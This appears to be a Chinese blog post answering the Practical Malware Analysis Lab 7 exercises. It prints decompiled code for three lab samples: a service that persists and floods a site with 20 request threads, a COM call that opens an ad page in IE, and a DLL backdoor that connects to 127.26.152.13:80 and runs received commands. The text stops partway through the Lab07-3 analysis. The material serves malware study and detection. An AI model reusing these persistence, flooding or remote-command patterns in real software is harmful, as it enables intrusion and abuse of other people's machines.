<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang="zh-CN">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon.ico?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon.ico?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Hexo, NexT" />










<meta name="description" content="Lab7-1Q1：当计算机重启之后，这个程序如何保证它继续运行（达到持久化驻留）创建一个Malservice的服务，并且该服务具有开机自启动的权限。 主函数简单跟一下： 12345678910111213int __cdecl main(int argc, const char **argv, const char **envp)&amp;#123;  SERVICE_TABLE_ENTRYA Servi">
<meta property="og:type" content="article">
<meta property="og:title" content="恶意代码分析实战 Lab7">
<meta property="og:url" content="http:&#x2F;&#x2F;yoursite.com&#x2F;2020&#x2F;04&#x2F;17&#x2F;lab7&#x2F;index.html">
<meta property="og:site_name" content="Ivoripuion&#39;s blog">
<meta property="og:description" content="Lab7-1Q1：当计算机重启之后，这个程序如何保证它继续运行（达到持久化驻留）创建一个Malservice的服务，并且该服务具有开机自启动的权限。 主函数简单跟一下： 12345678910111213int __cdecl main(int argc, const char **argv, const char **envp)&amp;#123;  SERVICE_TABLE_ENTRYA Servi">
<meta property="og:locale" content="zh-CN">
<meta property="og:updated_time" content="2020-04-18T06:35:14.488Z">
<meta name="twitter:card" content="summary">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2020/04/17/lab7/"/>





  <title>恶意代码分析实战 Lab7 | Ivoripuion's blog</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-CN">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Ivoripuion's blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-question-circle"></i> <br />
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-pwn">
          <a href="/categories/pwn" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-question-circle"></i> <br />
            
            pwn
          </a>
        </li>
      
        
        <li class="menu-item menu-item-web">
          <a href="/categories/web" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-question-circle"></i> <br />
            
            web
          </a>
        </li>
      
        
        <li class="menu-item menu-item-reverse">
          <a href="/categories/reverse" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-question-circle"></i> <br />
            
            reverse
          </a>
        </li>
      
        
        <li class="menu-item menu-item-随想">
          <a href="/categories/%E9%9A%8F%E6%83%B3" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-question-circle"></i> <br />
            
            随想
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2020/04/17/lab7/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Ivoripuion">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/me.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Ivoripuion's blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">恶意代码分析实战 Lab7</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2020-04-17T23:37:12+08:00">
                2020-04-17
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">In</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/reverse/" itemprop="url" rel="index">
                    <span itemprop="name">reverse</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="Lab7-1"><a href="#Lab7-1" class="headerlink" title="Lab7-1"></a>Lab7-1</h1><h2 id="Q1：当计算机重启之后，这个程序如何保证它继续运行（达到持久化驻留）"><a href="#Q1：当计算机重启之后，这个程序如何保证它继续运行（达到持久化驻留）" class="headerlink" title="Q1：当计算机重启之后，这个程序如何保证它继续运行（达到持久化驻留）"></a>Q1：当计算机重启之后，这个程序如何保证它继续运行（达到持久化驻留）</h2><p>创建一个Malservice的服务，并且该服务具有开机自启动的权限。</p>
<p>主函数简单跟一下：</p>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">int</span> __<span class="function">cdecl <span class="title">main</span><span class="params">(<span class="keyword">int</span> argc, <span class="keyword">const</span> <span class="keyword">char</span> **argv, <span class="keyword">const</span> <span class="keyword">char</span> **envp)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  SERVICE_TABLE_ENTRYA ServiceStartTable; <span class="comment">// [esp+0h] [ebp-10h]</span></span><br><span class="line">  <span class="keyword">int</span> v5; <span class="comment">// [esp+8h] [ebp-8h]</span></span><br><span class="line">  <span class="keyword">int</span> v6; <span class="comment">// [esp+Ch] [ebp-4h]</span></span><br><span class="line"></span><br><span class="line">  ServiceStartTable.lpServiceName = aMalservice;</span><br><span class="line">  ServiceStartTable.lpServiceProc = createProcess_401040;</span><br><span class="line">  v5 = <span class="number">0</span>;</span><br><span class="line">  v6 = <span class="number">0</span>;</span><br><span class="line">  StartServiceCtrlDispatcherA(&amp;ServiceStartTable);</span><br><span class="line">  <span class="keyword">return</span> createProcess_401040();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>SERVICE_TABLE_ENTRYA结构体定义如下，用于被StartServiceCtrlDispatcher()函数调用，连接程序主线程到服务控制管理程序：</p>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="class"><span class="keyword">struct</span> _<span class="title">SERVICE_TABLE_ENTRYA</span> &#123;</span></span><br><span class="line">  LPSTR                    lpServiceName;   <span class="comment">// 服务名称。</span></span><br><span class="line">  LPSERVICE_MAIN_FUNCTIONA lpServiceProc;   <span class="comment">// 服务入口函数。</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>StartServiceCtrlDispatcher()函数调用：</p>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">BOOL <span class="title">StartServiceCtrlDispatcher</span><span class="params">(</span></span></span><br><span class="line"><span class="function"><span class="params">  CONST SERVICE_TABLE_ENTRYA *lpServiceStartTable <span class="comment">// SERVICE_TABLE_ENTRYA 结构体变量。</span></span></span></span><br><span class="line"><span class="function"><span class="params">)</span></span>;</span><br></pre></td></tr></table></figure>

<p>这里调用了createProcess_401040函数，分析如下：</p>
<p>首先创建一个名为HGL345的互斥量来限制系统只运行了一个该程序，若检测出已创建了该互斥量，程序就会退出：</p>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> ( OpenMutexA(MUTEX_ALL_ACCESS, <span class="number">0</span>, Name) )  <span class="comment">// Name=HGL345</span></span><br><span class="line">                                              <span class="comment">// MUTEX_ALL_ACCESS指用所有权限打开这个互斥量</span></span><br><span class="line">  ExitProcess(<span class="number">0</span>);</span><br><span class="line">CreateMutexA(<span class="number">0</span>, <span class="number">0</span>, Name);</span><br></pre></td></tr></table></figure>

<p>然后打开一个服务控制管理器的句柄，以便这个程序可以添加或者修改服务：</p>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">v0 = OpenSCManagerA(<span class="number">0</span>, <span class="number">0</span>, <span class="number">3u</span>);</span><br></pre></td></tr></table></figure>

<p>获得当前进程的句柄：</p>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">GetCurrentProcess();</span><br></pre></td></tr></table></figure>

<p>获得当前进程调用的dll的绝对路径，传给Filename：</p>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">GetModuleFileNameA(<span class="number">0</span>, &amp;Filename, <span class="number">0x3E8</span>u);</span><br></pre></td></tr></table></figure>

<p>CreateServiceA创建一个服务对象，并将其添加到指定的服务控制管理器数据库。这里使用的就是刚才的Filename路径对应的dll；服务启动类型为SERVICE_AUTO_START，即创建的服务具有开机自启动的权限；服务类型为SERVICE_WIN32_OWN_PROCESS，表明该服务的进程只包含有一个服务；服务名称为Malservice：</p>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">CreateServiceA(</span><br><span class="line">  v0,</span><br><span class="line">  DisplayName,</span><br><span class="line">  DisplayName,</span><br><span class="line">  SC_MANAGER_CREATE_SERVICE,</span><br><span class="line">  SERVICE_WIN32_OWN_PROCESS,</span><br><span class="line">  SERVICE_AUTO_START,</span><br><span class="line">  <span class="number">0</span>,</span><br><span class="line">  &amp;Filename,</span><br><span class="line">  <span class="number">0</span>,</span><br><span class="line">  <span class="number">0</span>,</span><br><span class="line">  <span class="number">0</span>,</span><br><span class="line">  <span class="number">0</span>,</span><br><span class="line">  <span class="number">0</span>);                                         <span class="comment">// Dispaly=Malservice</span></span><br></pre></td></tr></table></figure>

<p>设置该服务的开始时间以及持续时间，设定方式是通过WaitForSingleObject函数在指定时间唤醒这个服务，然后持续时间为0xFFFFFFFF：</p>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">*&amp;SystemTime.wYear = <span class="number">0</span>;</span><br><span class="line">*&amp;SystemTime.wDayOfWeek = <span class="number">0</span>;</span><br><span class="line">*&amp;SystemTime.wHour = <span class="number">0</span>;</span><br><span class="line">*&amp;SystemTime.wSecond = <span class="number">0</span>;</span><br><span class="line">SystemTime.wYear = <span class="number">2100</span>;</span><br><span class="line">SystemTimeToFileTime(&amp;SystemTime, &amp;FileTime);</span><br><span class="line">v1 = CreateWaitableTimerA(<span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>);</span><br><span class="line">SetWaitableTimer(v1, &amp;FileTime, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>);</span><br><span class="line"><span class="keyword">if</span> ( !WaitForSingleObject(v1, <span class="number">0xFFFFFFFF</span>) )</span><br><span class="line">&#123;</span><br><span class="line">  v2 = <span class="number">20</span>;</span><br><span class="line">  <span class="keyword">do</span></span><br><span class="line">  &#123;</span><br><span class="line">    CreateThread(<span class="number">0</span>, <span class="number">0</span>, StartAddress, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>);</span><br><span class="line">    --v2;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">while</span> ( v2 );</span><br><span class="line">&#125;</span><br><span class="line">Sleep(<span class="number">0xFFFFFFFF</span>);</span><br></pre></td></tr></table></figure>

<p>在服务创建时会创建20个线程，执行StartAddress函数：</p>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">v2 = <span class="number">20</span>;</span><br><span class="line"><span class="keyword">do</span></span><br><span class="line">&#123;</span><br><span class="line">  CreateThread(<span class="number">0</span>, <span class="number">0</span>, StartAddress, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>);</span><br><span class="line">  --v2;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">while</span> ( v2 );</span><br></pre></td></tr></table></figure>

<p>StartAddress函数，使用 User-Agent = szAgent=Internet Explorer 8.0 对<a href="http://www.malwareanalysisbook.com" target="_blank" rel="noopener">http://www.malwareanalysisbook.com</a>的站点进行访问：</p>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">void</span> __stdcall __<span class="function">noreturn <span class="title">StartAddress</span><span class="params">(LPVOID lpThreadParameter)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">void</span> *i; <span class="comment">// esi</span></span><br><span class="line"></span><br><span class="line">  <span class="keyword">for</span> ( i = InternetOpenA(szAgent, <span class="number">1u</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>); ; InternetOpenUrlA(i, szUrl, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0x80000000</span>, <span class="number">0</span>) )<span class="comment">// szAgent=Internet Explorer 8.0</span></span><br><span class="line">                                                <span class="comment">// szUrl=http://www.malwareanalysisbook.com</span></span><br><span class="line">    ;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h2 id="Q2：为什么这个程序会使用一个互斥量？"><a href="#Q2：为什么这个程序会使用一个互斥量？" class="headerlink" title="Q2：为什么这个程序会使用一个互斥量？"></a>Q2：为什么这个程序会使用一个互斥量？</h2><p>确保该程序在一个系统中只会装载为一个进程。</p>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> ( OpenMutexA(MUTEX_ALL_ACCESS, <span class="number">0</span>, Name) )  <span class="comment">// Name=HGL345</span></span><br><span class="line">                                              <span class="comment">// MUTEX_ALL_ACCESS指用所有权限打开这个互斥量</span></span><br><span class="line">  ExitProcess(<span class="number">0</span>);</span><br><span class="line">CreateMutexA(<span class="number">0</span>, <span class="number">0</span>, Name);</span><br></pre></td></tr></table></figure>

<h2 id="Q3：可以用来检测这个程序的基于主机特征是什么？"><a href="#Q3：可以用来检测这个程序的基于主机特征是什么？" class="headerlink" title="Q3：可以用来检测这个程序的基于主机特征是什么？"></a>Q3：可以用来检测这个程序的基于主机特征是什么？</h2><p>可以查看一台主机是否启动了Malservice的服务来判断。</p>
<h2 id="Q4：检测这个恶意代码的基于网络特征是什么？"><a href="#Q4：检测这个恶意代码的基于网络特征是什么？" class="headerlink" title="Q4：检测这个恶意代码的基于网络特征是什么？"></a>Q4：检测这个恶意代码的基于网络特征是什么？</h2><p>在2100年1月1日以后可以检测出特征：对 <a href="http://www.malwareanalysisbook.com" target="_blank" rel="noopener">http://www.malwareanalysisbook.com</a> 发送User-Agent=Internet Explorer 8.0 的大量请求。</p>
<h2 id="Q5：这个程序的目的是什么？"><a href="#Q5：这个程序的目的是什么？" class="headerlink" title="Q5：这个程序的目的是什么？"></a>Q5：这个程序的目的是什么？</h2><p>创建一个服务Malservice，该服务会在2100年1月1日以后持续的对 <a href="http://www.malwareanalysisbook.com" target="_blank" rel="noopener">http://www.malwareanalysisbook.com</a> 站点发送线程数为20的请求，类似Ddos。</p>
<h2 id="Q6：这个程序什么时候完成执行？"><a href="#Q6：这个程序什么时候完成执行？" class="headerlink" title="Q6：这个程序什么时候完成执行？"></a>Q6：这个程序什么时候完成执行？</h2><p>当服务开始后，没有外力干涉，永远不会完成执行。</p>
<h1 id="Lab7-2"><a href="#Lab7-2" class="headerlink" title="Lab7-2"></a>Lab7-2</h1><h2 id="Q1：这个程序如何完成持久化驻留？"><a href="#Q1：这个程序如何完成持久化驻留？" class="headerlink" title="Q1：这个程序如何完成持久化驻留？"></a>Q1：这个程序如何完成持久化驻留？</h2><p>该程序不存在完成持久化驻留的行为。</p>
<p>main函数主要结构如下：</p>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"> <span class="keyword">if</span> ( OleInitialize(<span class="number">0</span>) &gt;= <span class="number">0</span> )</span><br><span class="line">  &#123;</span><br><span class="line">    CoCreateInstance(&amp;rclsid, <span class="number">0</span>, <span class="number">4u</span>, &amp;riid, &amp;ppv); <span class="comment">//0002DF01-0000-0000-C000-000000000046和 D30C1661-CDAF-11D0-8A3E-00C04FC9E26E</span></span><br><span class="line">    <span class="keyword">if</span> ( ppv )</span><br><span class="line">    &#123;</span><br><span class="line">      VariantInit(&amp;pvarg);</span><br><span class="line">      v7 = <span class="number">3</span>;</span><br><span class="line">      v8 = <span class="number">1</span>;</span><br><span class="line">      v3 = SysAllocString(psz);</span><br><span class="line">      (*(*ppv + <span class="number">44</span>))(ppv, v3, &amp;v7, &amp;pvarg, &amp;pvarg, &amp;pvarg);<span class="comment">//.data:00403010 psz:                                    ; DATA XREF: _main+3C↑o</span></span><br><span class="line">.data:00403010                 text "UTF-16LE", 'http://www.malwareanalysisbook.com/ad.html',0</span><br><span class="line">      SysFreeString(v3);</span><br><span class="line">    &#125;</span><br><span class="line">    OleUninitialize();</span><br><span class="line">  &#125;</span><br></pre></td></tr></table></figure>

<p>首先判断是否能初始化COM运行环境；</p>
<p>若能则创建一个COM实例，返回的对象会保存到ppv中。这里创建实例的两个参数：</p>
<p>0002DF01-0000-0000-C000-000000000046 , D30C1661-CDAF-11D0-8A3E-00C04FC9E26E</p>
<p>表明了表明了调用程序在注册表中的位置，查找资料后：</p>
<p>D30C1661-CDAF-11D0-8A3E-00C04FC9E26E：IWebBrowser2</p>
<p>0002DF01-0000-0000-C000-000000000046：IE</p>
<p>即该COM对象是对应了这两个程序。</p>
<p>当实例创建成功，使用该COM对象去访问<a href="http://www.malwareanalysisbook.com/ad.html" target="_blank" rel="noopener">http://www.malwareanalysisbook.com/ad.html</a>，然后退出。</p>
<h2 id="Q2：这个程序的目的是什么？"><a href="#Q2：这个程序的目的是什么？" class="headerlink" title="Q2：这个程序的目的是什么？"></a>Q2：这个程序的目的是什么？</h2><p>使用IE或者IWebBrowser2去访问<a href="http://www.malwareanalysisbook.com/ad.html" target="_blank" rel="noopener">http://www.malwareanalysisbook.com/ad.html</a>。</p>
<h2 id="Q3：这个程序什么时候完成执行？"><a href="#Q3：这个程序什么时候完成执行？" class="headerlink" title="Q3：这个程序什么时候完成执行？"></a>Q3：这个程序什么时候完成执行？</h2><p>当访问<a href="http://www.malwareanalysisbook.com/ad.html" target="_blank" rel="noopener">http://www.malwareanalysisbook.com/ad.html</a>完毕后，程序完成执行。</p>
<h1 id="Lab7-3"><a href="#Lab7-3" class="headerlink" title="Lab7-3"></a>Lab7-3</h1><h2 id="Q1：这个程序如何完成持久化驻留，来确保在计算机被重启后它能继续运行？"><a href="#Q1：这个程序如何完成持久化驻留，来确保在计算机被重启后它能继续运行？" class="headerlink" title="Q1：这个程序如何完成持久化驻留，来确保在计算机被重启后它能继续运行？"></a>Q1：这个程序如何完成持久化驻留，来确保在计算机被重启后它能继续运行？</h2><p>程序将Lab07-3.dll复制到C:\windows\system32\kerne132.dll，并将C:盘中所有导入kernel32.dll的exe改为导入kerne132.dll，以此达到持久化驻留。</p>
<h3 id="分析dll"><a href="#分析dll" class="headerlink" title="分析dll"></a>分析dll</h3><p>由于exe文件没有找到明显的调用dll库的函数（loadlibrary或者getProcAddress）所以首先分析dll文件。</p>
<p>dll文件也没有任何导出函数，只存在一个dll entry：</p>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">DllEntryPoint	<span class="number">100012F</span>A	[main entry]</span><br></pre></td></tr></table></figure>

<p>查看Function call：</p>
<p>首先开辟函数的栈：</p>
<figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">call</span>    <span class="built_in">ds</span>:inet_addr</span><br></pre></td></tr></table></figure>

<p>保证程序独享：</p>
<figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">call</span>    <span class="built_in">ds</span>:OpenMutexA</span><br><span class="line"><span class="keyword">call</span>    <span class="built_in">ds</span>:CreateMutexA</span><br></pre></td></tr></table></figure>

<p>创建一个socket交互数据：</p>
<figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">call</span>    <span class="built_in">ds</span>:WSAStartup</span><br><span class="line"><span class="keyword">call</span>    <span class="built_in">ds</span>:socket</span><br><span class="line"><span class="keyword">call</span>    <span class="built_in">ds</span>:inet_addr</span><br><span class="line"><span class="keyword">call</span>    <span class="built_in">ds</span>:htons</span><br><span class="line"><span class="keyword">call</span>    <span class="built_in">ds</span>:connect</span><br><span class="line"><span class="keyword">call</span>    <span class="built_in">ds</span>:send</span><br><span class="line"><span class="keyword">call</span>    <span class="built_in">ds</span>:shutdown</span><br><span class="line"><span class="keyword">call</span>    <span class="built_in">ds</span>:recv</span><br><span class="line"><span class="keyword">call</span>    <span class="built_in">ebp</span> <span class="comment">; strncmp</span></span><br><span class="line"><span class="keyword">call</span>    <span class="built_in">ds</span>:Sleep</span><br><span class="line"><span class="keyword">call</span>    <span class="built_in">ebp</span> <span class="comment">; strncmp</span></span><br><span class="line"><span class="keyword">call</span>    <span class="built_in">ebx</span> <span class="comment">; CreateProcessA</span></span><br><span class="line"><span class="keyword">call</span>    <span class="built_in">ds</span>:CloseHandle</span><br><span class="line"><span class="keyword">call</span>    <span class="built_in">ds</span>:closesocket</span><br><span class="line"><span class="keyword">call</span>    <span class="built_in">ds</span>:WSACleanup</span><br></pre></td></tr></table></figure>

<p>建立socket的恶意代码，疑似远程的shell。</p>
<p>分析socket相关函数，connect函数上下文找到了连接的IP:”127.26.152.13”：</p>
<figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="symbol">.text:</span>100010A3                 <span class="keyword">push</span>    offset cp       <span class="comment">; "127.26.152.13"</span></span><br><span class="line"><span class="symbol">.text:</span>100010A8                 <span class="keyword">mov</span>     [<span class="built_in">esp</span>+<span class="number">120Ch</span>+name<span class="number">.</span>sa_family], <span class="number">2</span></span><br><span class="line"><span class="symbol">.text:</span>100010AF                 <span class="keyword">call</span>    <span class="built_in">ds</span>:inet_addr</span><br><span class="line"><span class="symbol">.text:</span>100010B5                 <span class="keyword">push</span>    <span class="number">80</span>             <span class="comment">; hostshort</span></span><br><span class="line"><span class="symbol">.text:</span>100010B7                 <span class="keyword">mov</span>     <span class="built_in">dword</span> <span class="built_in">ptr</span> [<span class="built_in">esp</span>+<span class="number">120Ch</span>+name<span class="number">.</span>sa_data+<span class="number">2</span>], <span class="built_in">eax</span></span><br><span class="line"><span class="symbol">.text:</span>100010BB                 <span class="keyword">call</span>    <span class="built_in">ds</span>:htons</span><br><span class="line"><span class="symbol">.text:</span>100010C1                 <span class="keyword">lea</span>     <span class="built_in">edx</span>, [<span class="built_in">esp</span>+<span class="number">1208h</span>+name]</span><br><span class="line"><span class="symbol">.text:</span>100010C5                 <span class="keyword">push</span>    <span class="number">16</span>             <span class="comment">; namelen</span></span><br><span class="line"><span class="symbol">.text:</span>100010C7                 <span class="keyword">push</span>    <span class="built_in">edx</span>             <span class="comment">; name</span></span><br><span class="line"><span class="symbol">.text:</span>100010C8                 <span class="keyword">push</span>    <span class="built_in">esi</span>             <span class="comment">; s</span></span><br><span class="line"><span class="symbol">.text:</span>100010C9                 <span class="keyword">mov</span>     <span class="built_in">word</span> <span class="built_in">ptr</span> [<span class="built_in">esp</span>+<span class="number">1214h</span>+name<span class="number">.</span>sa_data], <span class="built_in">ax</span></span><br><span class="line"><span class="symbol">.text:</span>100010CE                 <span class="keyword">call</span>    <span class="built_in">ds</span>:connect</span><br></pre></td></tr></table></figure>

<p>分析这部分的伪代码，connect的是127.26.152.13:80：</p>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">*name.sa_data = htons(<span class="number">80u</span>);</span><br><span class="line"><span class="keyword">if</span> ( <span class="built_in">connect</span>(v3, &amp;name, <span class="number">16</span>) != <span class="number">-1</span> )</span><br></pre></td></tr></table></figure>

<p>发送了一个”hello”：</p>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">while</span> ( send(v3, ::buf, <span class="built_in">strlen</span>(::buf), <span class="number">0</span>) != <span class="number">-1</span> &amp;&amp; <span class="built_in">shutdown</span>(v3, <span class="number">1</span>) != <span class="number">-1</span> )<span class="comment">// buff="hello"</span></span><br></pre></td></tr></table></figure>

<p>发送”hello”后，将会期望服务器发送一个指令，将指令保存到buf中，针对buf的命令做出以下一些操作：</p>
<ol>
<li>buf=”sleep”：程序Sleep 0x60000 ms；</li>
<li>buf=”exec”：程序创建一个进程，执行CommandLine中的命令，启动一个程序；</li>
<li>buf=”q”：退出shell；</li>
</ol>
